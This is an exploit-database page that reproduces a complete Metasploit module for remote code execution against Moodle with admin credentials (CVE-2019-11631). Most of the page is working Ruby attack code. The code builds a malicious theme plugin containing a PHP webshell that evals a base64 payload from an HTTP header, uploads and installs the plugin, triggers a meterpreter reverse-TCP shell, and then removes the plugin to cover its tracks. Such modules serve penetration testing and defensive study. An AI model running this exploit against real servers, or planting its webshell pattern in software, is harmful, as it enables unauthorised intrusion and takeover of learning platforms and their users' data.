Lucene search

K
zdtMetasploit1337DAY-ID-36891
HistoryOct 13, 2021 - 12:00 a.m.

Moodle Admin Shell Upload Exploit

2021-10-1300:00:00
metasploit
0day.today
1197
metasploit
moodle
remote execution
admin credentials
version 3.6.3
version 3.8.0
version 3.9.0
version 3.10.0
version 3.11.2
plugin
payload
base64
vulnerability
php
remote code execution
cve-2019-11631
exploit

EPSS

0.54

Percentile

97.6%

This Metasploit module will generate a plugin which can receive a malicious payload request and upload it to a server running Moodle provided valid admin credentials are used. Then the payload is sent for execution, and the plugin uninstalled. You must have an admin account to exploit this vulnerability. Successfully tested against versions 3.6.3, 3.8.0, 3.9.0, 3.10.0, and 3.11.2.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Post::File
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Moodle

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Moodle Admin Shell Upload',
        'Description' => %q{
          This module will generate a plugin which can receive a malicious
          payload request and upload it to a server running Moodle
          provided valid admin credentials are used.  Then the payload
          is sent for execution, and the plugin uninstalled.

          You must have an admin account to exploit this vulnerability.

          Successfully tested against 3.6.3, 3.8.0, 3.9.0, 3.10.0, 3.11.2
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'AkkuS <Γ–zkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
          'h00die' # msf module cleanup and inclusion
        ],
        'References' => [
          ['URL', 'http://pentest.com.tr/exploits/Moodle-3-6-3-Install-Plugin-Remote-Command-Execution.html'],
          ['EDB', '46775'],
          ['CVE', '2019-11631'] # rejected, its a feature!
        ],
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Targets' => [['Automatic', {}]],
        'Privileged' => false,
        'DisclosureDate' => '2019-04-28',
        'DefaultTarget' => 0,
        'DefaultOptions' => { 'Payload' => 'php/meterpreter/reverse_tcp' },
        'Payload' => {
          'BadChars' => "'",
          'Space' => 6070 # apache default is 8196, but 35% overhead for base64 encoding
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        OptString.new('USERNAME', [true, 'Admin username to authenticate with', 'admin']),
        OptString.new('PASSWORD', [false, 'Admin password to authenticate with', ''])
      ]
    )
  end

  def create_addon_file
    # There are syntax errors in creating zip file. So the payload was sent as base64.
    plugin_file = Rex::Zip::Archive.new
    header = Rex::Text.rand_text_alpha_upper(4)
    plugin_name = Rex::Text.rand_text_alpha_lower(8)

    print_status("Creating plugin named: #{plugin_name} with poisoned header: #{header}")

    path = "#{plugin_name}/version.php"
    path2 = "#{plugin_name}/lang/en/theme_#{plugin_name}.php"
    # "$plugin->version" and "$plugin->component" contents are required to accept Moodle plugin.
    plugin_file.add_file(path, "<?php $plugin->version = #{Time.now.to_time.to_i}; $plugin->component = 'theme_#{plugin_name}';")
    plugin_file.add_file(path2, "<?php eval(base64_decode($_SERVER['HTTP_#{header}'])); ?>")
    # plugin_file.add_file(path2, "<?php #{payload.encoded}) ?>")
    return plugin_file.pack, header, plugin_name
  end

  def exec_code(plugin_name, header)
    # Base64 was encoded in "PHP". This process was sent as "HTTP headers".
    print_status('Triggering payload')
    send_request_cgi({
      'keep_cookies' => true,
      'uri' => normalize_uri(target_uri.path, 'theme', plugin_name, 'lang', 'en', "theme_#{plugin_name}.php"),
      'raw_headers' => "#{header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
    })
  end

  def check
    v = moodle_version
    return CheckCode::Detected('Unable to determine moodle version') if v.nil?

    # This is a feature, not a vuln, so we assume this to work on 3.0.0+
    # assuming the plugin arch changed before that.
    # > 3.0, < 3.9
    version = Rex::Version.new(v)
    if version > Rex::Version.new('3.0.0')
      return CheckCode::Appears("Exploitable Moodle version #{v} detected")
    end

    CheckCode::Safe("Non-exploitable Moodle version #{v} detected")
  end

  def exploit
    v = moodle_version
    fail_with(Failure::NoTarget, 'Unable to determine moodle version') if v.nil?

    version = Rex::Version.new(v)
    print_status("Authenticating as user: #{datastore['USERNAME']}")
    cookies = moodle_login(datastore['USERNAME'], datastore['PASSWORD'])
    fail_with(Failure::NoAccess, 'Unable to login. Check credentials') if cookies.nil? || cookies.empty?
    cookies.each do |cookie|
      cookie_jar.add(cookie)
    end

    print_good("Authentication was successful with user: #{datastore['USERNAME']}")
    print_status('Creating addon file')
    addon_content, header, addon_name = create_addon_file
    print_status('Uploading addon')
    file_id, sesskey = upload_addon(addon_name, version, addon_content)
    fail_with(Failure::NoAccess, 'Unable to upload addon.  Make sure you are able to upload plugins with current permissions') if file_id.nil?
    print_good('Upload Successful.  Integrating addon')
    ret = plugin_integration(sesskey, file_id, addon_name)
    if ret.nil?
      fail_with(Failure::NoAccess, 'Install not successful')
    end
    exec_code(addon_name, header)
    print_status('Uninstalling plugin after 5 second delay so payload can change directories')
    sleep(5)
    remove_plugin("theme_#{addon_name}", version, sesskey)
  end

  def on_new_session(_)
    print_good('You will need to change directories on meterpreter to get full functionality. Try: cd /tmp')
  end
end

EPSS

0.54

Percentile

97.6%